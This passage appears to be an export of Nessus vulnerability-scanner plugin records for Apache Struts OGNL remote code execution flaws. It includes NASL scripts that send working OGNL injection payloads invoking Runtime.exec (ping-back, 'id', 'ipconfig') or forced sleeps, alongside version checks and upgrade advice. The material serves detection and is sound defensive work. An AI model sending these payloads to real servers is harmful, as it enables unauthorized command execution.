(!empty_or_null(os) && \"windows\" >< tolower(os))\n {\n ping_cmd = \"ping%20-n%203%20-l%20500%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip + \" and greater 500\";\n }\n else\n {\n ping_cmd = \"ping%20-c%203%20-p\" + pat + \"%20\" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip;\n }\n\n payload_ping = \"?redirect:$%7b%23context%5b%27xwork.MethodAccessor.denyMethodExecution\" +\n \"%27%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28\" +\n \"%27allowStaticMethodAccess%27%29%2c%23f.setAccessible%28true%29%2c%23f.set%28\" +\n \"%23_memberAccess%2ctrue%29%2c@org.apache.commons.io.IOUtils@toString%28\" +\n \"@java.lang.Runtime@getRuntime%28%29.exec%28%27\" + ping_cmd + \n \"%27%29.getInputStream%28%29%29%7d\";\n\n foreach url (urls)\n {\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n attack_url = url + payload_ping;\n\n req =\n 'GET ' + attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n '\\n';\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n break;\n }\n }\n}\n\n# and finally, we try a simple injection of an ognl add.\nif(!vuln)\n{\n foreach url (urls)\n { \n payload_ognl_add = \"?redirect:%24%7B57550614%2b16044095%7D\";\n payload_redirect_verify_regex = \"Location: .*73594709\";\n \n attack_url = url + payload_ognl_add;\n\n res = http_send_recv3(\n method : \"GET\",\n item : attack_url,\n port : port,\n exit_on_fail : TRUE,\n follow_redirect: 0\n );\n\n if (res[1] =~ payload_redirect_verify_regex)\n {\n vuln = TRUE;\n vuln_url = attack_url;\n break;\n }\n\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n }\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(build_url(qs:vuln_url, port:port)),\n output : chomp(res[2])\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-03T15:54:47", "description": "The instance of Selligent Message Studio running on the remote host is affected by CVE-2013-2251, a code execution vulnerability in Apache Struts (S2-016). A remote, unauthenticated attacker can exploit this issue, via a specially crafted HTTP request, to execute code on the remote host.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-11-05T00:00:00", "type": "nessus", "title": "Selligent Message Studio Struts Code Execution (CVE-2013-2251)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2251"], "modified": "2022-04-25T00:00:00", "cpe": ["x-cpe:/a:selligent:selligent_message_studio"], "id": "SELLIGENT_MESSAGE_STUDIO_CVE-2013-2251.NBIN", "href": "https://www.tenable.com/plugins/nessus/142462", "sourceData": "Binary data selligent_message_studio_CVE-2013-2251.nbin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:07:57", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.3. It, therefore, is affected by a remote command execution vulnerability in the ParameterInterceptor class due to improper handling of user-supplied input data. An unauthenticated, remote attacker could exploit this issue, via a crafted parameter name to execute arbitrary OGNL code.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-09-13T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.14.3 Remote Code Execution Vulnerability (S2-012)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1965"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_3_S2012.NASL", "href": "https://www.tenable.com/plugins/nessus/128765", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128765);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-1965\");\n script_bugtraq_id(60082);\n\n script_name(english:\"Apache Struts 2.x < 2.3.14.3 Remote Code Execution Vulnerability (S2-012)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework that is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.3. It, therefore, is affected by a\nremote command execution vulnerability in the ParameterInterceptor class due to improper handling of user-supplied input\ndata. An unauthenticated, remote attacker could exploit this issue, via a crafted parameter name to execute arbitrary\nOGNL code.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://cwiki.apache.org/confluence/display/WW/S2-012\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a1fcdf60\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.14.3 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts Showcase < 2.3.14.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/04/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::combined_get_app_info(app:'Apache Struts');\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '2.0.0', 'fixed_version' : '2.3.14.3' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:18:06", "description": "The remote web application appears to use Struts 2, a web framework that uses XWork. Due to a vulnerability in XWork, it is possible to disable settings designed to prevent remote code execution.\n\nA remote attacker can exploit this by submitting an HTTP request containing specially crafted OGNL statements, resulting in the execution of arbitrary Java.\n\nNote that versions of Apache Archiva includes Struts and may be affected.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2010-07-29T00:00:00", "type": "nessus", "title": "Apache Struts 2 / XWork Remote Code Execution (safe check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_XWORK_OGNL_CODE_EXECUTION_SAFE.NASL", "href": "https://www.tenable.com/plugins/nessus/47900", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47900);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2010-1870\");\n script_bugtraq_id(41592);\n script_xref(name:\"EDB-ID\", value:\"14360\");\n script_xref(name:\"EDB-ID\", value:\"17691\");\n script_xref(name:\"SECUNIA\", value:\"40558\");\n script_xref(name:\"SECUNIA\", value:\"40575\");\n\n script_name(english:\"Apache Struts 2 / XWork Remote Code Execution (safe check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A remote web application uses a framework that is affected by a code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nthat uses XWork. Due to a vulnerability in XWork, it is possible to\ndisable settings designed to prevent remote code execution.\n\nA remote attacker can exploit this by submitting an HTTP request\ncontaining specially crafted OGNL statements, resulting in the\nexecution of arbitrary Java.\n\nNote that versions of Apache Archiva includes Struts and may be\naffected.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-005.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://archiva.apache.org/docs/1.3.6/release-notes.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Struts 2.2.1 or later.\n\nAlternatively, upgrade to Archiva 1.3.6 or later if using that product.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-1870\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"NVD scores this vulnerability with a score of 5.0 but the Tenable Research Team disagrees with their finding and set it to a 10.0 instead.\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts < 2.2.0 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"White_Phosphorus\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\nurls = list_uniq(urls);\n\nsecs = make_list(5, 10, 20);\nvuln_actions = make_list();\n\nforeach dir (urls)\n{\n # assume the action is vulnerable unless proven otherwise\n vuln = TRUE;\n\n for (i = 0; i < max_index(secs) && vuln; i++)\n {\n millis = secs[i] * 1000;\n ognl =\n '(\\'\\\\u0023_memberAccess[\\\\\\'allowStaticMethodAccess\\\\\\']\\')(meh)=true&' +\n '(aaa)((\\'\\\\u0023context[\\\\\\'xwork.MethodAccessor.denyMethodExecution\\\\\\']\\\\u003d\\\\u0023foo\\')(\\\\u0023foo\\\\u003dnew%20java.lang.Boolean(%22false%22)))&' +\n '(asdf)((\\'\\\\u0023thread.sleep(' + millis +')\\')(\\\\u0023thread\\\\u003d@java.lang.Thread@currentThread()))=1';\n url = dir + '?' + ognl;\n\n http_set_read_timeout(secs[i] * 2);\n then = unixtime();\n res = http_send_recv3(\n method:'GET',\n item:url,\n port:port,\n exit_on_fail:TRUE\n );\n now = unixtime();\n\n # if it looks like this action isn't vulnerable, move on to checking\n # the next one\n if ( now - then < secs[i] || now - then > (secs[i]+5) ) vuln = FALSE;\n }\n\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nif (report_verbosity > 0)\n{\n report = get_vuln_report(\n header:\n 'Nessus determined a struts 2 application is vulnerable by\\n'+\n 'forcing it to sleep() before sending the server\\'s response.\\n'+\n 'This was verified using the following URL :',\n trailer:\n 'Please note Nessus stopped after detecting the first vulnerable\\n'+\n 'application. Others may be vulnerable.',\n items:url,\n port:port\n );\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:59:39", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.2.1. It, therefore, is affected by a possible remote code execution vulnerability when OGNL expressions are evaluated due to improper validation by the ParametersInterceptor class.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2018-09-10T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.2.1 OGNL RCE (S2-005)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_2_1.NASL", "href": "https://www.tenable.com/plugins/nessus/117363", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117363);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2010-1870\");\n script_bugtraq_id(41592);\n\n script_name(english:\"Apache Struts 2.x < 2.2.1 OGNL RCE (S2-005)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by a possible remote code execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.2.1. It, therefore, is affected by a possible remote code\nexecution vulnerability when OGNL expressions are evaluated due to\nimproper validation by the ParametersInterceptor class.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-005\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.2.1 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-1870\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts < 2.2.0 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"White_Phosphorus\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/08/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.1.8.1\", \"fixed_version\" : \"2.2.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-04-12T15:49:06", "description": "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. Due to an error in the way that the ExceptionDelegator component handles mismatched data types, an unauthenticated, remote attacker can execute arbitrary commands on the remote host by sending a specially crafted request order. This flaw is due to the ExceptionDelegator interpreting parameter values as OGNL expressions when there is a conversion error. \n\nNote that this plugin will only report the first vulnerable instance of a Struts 2 application.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2013-08-07T00:00:00", "type": "nessus", "title": "Apache Struts 2 ExceptionDelegator Arbitrary Remote Command Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0391"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_EXCEPTIONDELEGATOR_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/69240", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69240);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2012-0391\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/21\");\n\n script_name(english:\"Apache Struts 2 ExceptionDelegator Arbitrary Remote Command Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. Due to an error in the way that the ExceptionDelegator\ncomponent handles mismatched data types, an unauthenticated, remote\nattacker can execute arbitrary commands on the remote host by sending\na specially crafted request order. This flaw is due to the\nExceptionDelegator interpreting parameter values as OGNL expressions\nwhen there is a conversion error. \n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\");\n # https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?828dc6d2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-007.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-008.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.2.3.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0391\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"D2ExploitPack\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/08/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"torture_cgi.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig');\n\nvuln = FALSE;\nforeach url (urls)\n{\n # Grab CGI arguments for each .action file from KB\n cgi_args = get_cgi_arg_list(port:port, cgi:url);\n\n foreach cmd (cmds)\n {\n attack = \"\";\n exploit = \"'+(#_memberAccess[\" + '\"allowStaticMethodAccess\"]=true,' +\n \"@java.lang.Runtime@getRuntime().exec('\" + cmd + \"'))+'\";\n\n # Build a string with all CGI arguments set to the exploit string\n foreach arg (cgi_args)\n {\n attack += arg + \"=\" + exploit + \"&\";\n }\n attack = ereg_replace(string:attack, pattern:\"&$\", replace:\"\");\n attack_url = url + \"?\" + attack;\n\n # Try testing with GET first\n # attack_url should look like this example :\n # /dir/blah.action?param='+(#memberAccess[\"allowStaticMethodAccess\"]=true,\n # @java.lang.Runtime@getRuntime().exec('id'))+'\n res = http_send_recv3(\n method : \"GET\",\n item : attack_url,\n port : port,\n exit_on_fail : TRUE\n );\n\n if (res[2] =~ 'value=\"java\\\\.lang\\\\.(UNIX)?Process(Impl)?@(.+)\" id=')\n {\n vuln = TRUE;\n vuln_url = build_url(qs:attack_url, port:port);\n output = res[2];\n break;\n }\n\n # Else try testing with POST\n attack_post = urlencode(\n str : attack,\n unreserved : \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234\" +\n \"56789=&_.\"\n );\n\n res2 = http_send_recv3(\n method : \"POST\",\n item : url,\n data : attack_post,\n port : port,\n add_headers : make_array(\"Content-Type\",\n \"application/x-www-form-urlencoded\"),\n exit_on_fail : TRUE\n );\n\n if (res2[2] =~ 'value=\"java\\\\.lang\\\\.(UNIX)?Process(Impl)?@(.+)\" id=')\n {\n vuln = TRUE;\n vuln_url = http_last_sent_request();\n output = res2[2];\n break;\n }\n }\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(vuln_url),\n output : chomp(output)\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:26:51", "description": "The remote web application appears to use Apache Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. A remote code execution vulnerability exists due to double OGNL evaluation of attribute values assigned to certain tags. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code.\n\nNote that this plugin only reports the first vulnerable instance of a Struts 2 application.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-03-24T00:00:00", "type": "nessus", "title": "Apache Struts 2 Tag Attribute Double OGNL Evaluation RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0785"], "modified": 